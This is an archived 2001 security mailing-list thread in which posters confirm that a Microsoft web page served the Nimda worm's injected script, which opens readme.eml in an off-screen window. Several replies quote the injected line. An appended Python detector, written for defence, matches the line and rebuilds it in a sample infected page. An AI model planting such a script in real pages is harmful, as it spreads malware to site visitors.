From incidents-return-1582-roessler=does-not-exist.org@securityfocus.com Thu Sep 20 00:32:03 2001
From: "Steve Cody"
Subject: Please tell me I'm wrong: microsoft.com infected
Date: Wed, 19 Sep 2001 15:37:39 -0400

I just went to http://www.microsoft.com/frontpage, and my Symantec Norton
Antivirus popped up and denied access to readme.eml.

I could not view the source of the loaded page, so I can't verify that
it is definitely infected.

Steve

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com

From incidents-return-1588-roessler=does-not-exist.org@securityfocus.com Thu Sep 20 00:32:19 2001
Date: Wed, 19 Sep 2001 15:59:25 -0500
From: Rodrigo Goya
To: Steve Cody
Cc: incidents@securityfocus.com
Subject: Re: Please tell me I'm wrong: microsoft.com infected

Confirmed I see it:

window.open("readme.eml", null, "resizable=no,top=6000,left=6000")

Though it says "page not found".

Cheers,
Rodrigo

On Wed, Sep 19, 2001 at 03:37:39PM -0400, Steve Cody wrote:
> I just went to http://www.microsoft.com/frontpage, and my Symantec
> Norton Antivirus popped up and denied access to readme.eml.
>
> I could not view the source of the loaded page, so I can't verify that
> it is definitely infected.
>
> Steve

From incidents-return-1587-roessler=does-not-exist.org@securityfocus.com Thu Sep 20 00:32:23 2001
Date: Wed, 19 Sep 2001 17:54:03 -0400
From: "Michael H. Warfield"
To: Steve Cody
Cc: incidents@securityfocus.com
Subject: Re: Please tell me I'm wrong: microsoft.com infected

On Wed, Sep 19, 2001 at 03:37:39PM -0400, Steve Cody wrote:
> I just went to http://www.microsoft.com/frontpage, and my Symantec
> Norton Antivirus popped up and denied access to readme.eml.
> I could not view the source of the loaded page, so I can't verify that
> it is definitely infected.

Yes, indeedie do. Just did a wget http://www.microsoft.com/frontpage and
here is what's on da bottom:

[html][script language="JavaScript"]window.open("readme.eml", null, "resizable=no,top=6000,left=6000")[/script][/html]

Defanged by turning angle brackets into square brackets even though it's
not in an html attachment. ;-)

> Steve

--
Michael H. Warfield    | (770) 985-6132 | mhw@WittsEnd.com
(The Mad Wizard)       | (678) 463-0932 | http://www.wittsend.com/mhw/
NIC whois: MHW9        | An optimist believes we live in the best of all
PGP Key: 0xDF1DD471    | possible worlds. A pessimist is sure of it!

From incidents-return-1590-roessler=does-not-exist.org@securityfocus.com Thu Sep 20 00:32:20 2001
From: "Brian Morin"
To: "'Steve Cody'"
Subject: RE: Please tell me I'm wrong: microsoft.com infected
Date: Wed, 19 Sep 2001 16:55:20 -0500
Organization: Brightblade

OmG.. You are correct, check out the source...

--
Brian Morin

: -----Original Message-----
: From: Steve Cody [mailto:security@gulbrandsen.com]
: Sent: Wednesday, September 19, 2001 14:38
: To: incidents@securityfocus.com
: Subject: Please tell me I'm wrong: microsoft.com infected
:
: I just went to http://www.microsoft.com/frontpage, and my
: Symantec Norton Antivirus popped up and denied access to readme.eml.
:
: I could not view the source of the loaded page, so I can't
: verify that it is definitely infected.
:
: Steve

From incidents-return-1589-roessler=does-not-exist.org@securityfocus.com Thu Sep 20 00:32:18 2001
Date: Wed, 19 Sep 2001 15:01:32 -0700 (PDT)
From: Benjamin Franz
Subject: Re: Please tell me I'm wrong: microsoft.com infected

On Wed, 19 Sep 2001, Steve Cody wrote:
> I just went to http://www.microsoft.com/frontpage, and my Symantec
> Norton Antivirus popped up and denied access to readme.eml.
>
> I could not view the source of the loaded page, so I can't verify that
> it is definitely infected.

From the bottom of the page served from that URL:

window.open("readme.eml", null, "resizable=no,top=6000,left=6000")

I would call that a definite "Yes".

--
Benjamin Franz
Programs must be written for people to read, and only incidentally
for machines to execute.  ---Abelson and Sussman

From incidents-return-1591-roessler=does-not-exist.org@securityfocus.com Thu Sep 20 00:32:24 2001
Date: Wed, 19 Sep 2001 15:02:43 -0700 (PDT)
From: "Jay D. Dyson"
To: Incidents List, Bugtraq
Cc: Steve Cody
Subject: Re: Please tell me I'm wrong: microsoft.com infected
Organization: Treachery Unlimited - http://www.treachery.net/

On Wed, 19 Sep 2001, Steve Cody wrote:
> I just went to http://www.microsoft.com/frontpage, and my Symantec
> Norton Antivirus popped up and denied access to readme.eml.
>
> I could not view the source of the loaded page, so I can't verify that
> it is definitely infected.

Your worst fears have now been confirmed.

sasumata$ telnet www.microsoft.com 80
Trying 207.46.197.100...
Connected to www.microsoft.akadns.net.
Escape character is '^]'.
GET /frontpage/ HTTP/1.0

Microsoft's site has been compromised by Nimda. There is no disputing it now.

-Jay

--
"There's always time for a good cup of coffee"
Jay D. Dyson -- jdyson@treachery.net
What doesn't kill us only makes us stronger.

From incidents-return-1592-roessler=does-not-exist.org@securityfocus.com Thu Sep 20 00:32:29 2001
From: jmiller@rhythms.net
To: incidents@securityfocus.com
Subject: RE: Please tell me I'm wrong: microsoft.com infected
Date: Wed, 19 Sep 2001 16:13:39 -0600

Microsoft is not the only one, Dell is infected as well.

http://docs.us.dell.com/docs/systems/pcpxhj/

Jeremy

-----Original Message-----
From: Steve Cody [mailto:security@gulbrandsen.com]
Sent: Wednesday, September 19, 2001 1:38 PM
To: incidents@securityfocus.com
Subject: Please tell me I'm wrong: microsoft.com infected

I just went to http://www.microsoft.com/frontpage, and my Symantec Norton
Antivirus popped up and denied access to readme.eml.

I could not view the source of the loaded page, so I can't verify that
it is definitely infected.

Steve
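The marker the posters kept quoting (a script block appended after the page's real closing tag that opens readme.eml in a window pushed off-screen at top=6000,left=6000) is easy to scan for in fetched HTML. The detector below is an added example written for this archive, not code from any of the posters; the sample pages it scans are constructed and are not captures from the sites named in the thread.

```python
"""Detect the Nimda web-page injection quoted in the thread: a <script>
block that calls window.open() on readme.eml in an off-screen window."""
import re
from dataclasses import dataclass
from typing import List

# Matches window.open("<...>readme.eml", null, "<features>"), tolerant of
# quote style and whitespace; the feature string is captured for analysis.
NIMDA_OPEN = re.compile(
    r'window\.open\(\s*["\']([^"\']*readme\.eml)["\']\s*,\s*null\s*,'
    r'\s*["\']([^"\']*)["\']\s*\)',
    re.IGNORECASE,
)
SCRIPT_BLOCK = re.compile(r"<script[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)


@dataclass
class Finding:
    target: str       # the file the injected script tries to open
    offscreen: bool   # window placed far outside the viewport (top/left=6000)
    appended: bool    # injected after the document's own closing </html>


def scan_html(html: str) -> List[Finding]:
    """Return one Finding per Nimda-style window.open() inside a <script> block."""
    findings: List[Finding] = []
    # Nimda tacked a second <html>...</html> onto the end of the file, so a
    # script that starts after the first </html> is a strong signal.
    first_close = html.lower().find("</html>")
    for block in SCRIPT_BLOCK.finditer(html):
        for m in NIMDA_OPEN.finditer(block.group(1)):
            features = m.group(2).lower()
            offscreen = "top=6000" in features or "left=6000" in features
            appended = first_close != -1 and block.start() > first_close
            findings.append(Finding(m.group(1), offscreen, appended))
    return findings


def is_infected(html: str) -> bool:
    """True if any script in the page opens readme.eml."""
    return any(f.target.lower().endswith("readme.eml") for f in scan_html(html))


# Constructed samples (not captured content): a clean page, and the same
# page with the injection from the thread appended after its closing tag.
CLEAN_PAGE = "<html><body><h1>FrontPage</h1></body></html>\n"
INFECTED_PAGE = CLEAN_PAGE + (
    '<html><script language="JavaScript">window.open("readme.eml", null, '
    '"resizable=no,top=6000,left=6000")</script></html>'
)
```

Running `scan_html` over the body returned by a plain `GET /frontpage/ HTTP/1.0`, as Jay did by hand with telnet, turns the eyeball check into one that can be repeated across a list of hosts.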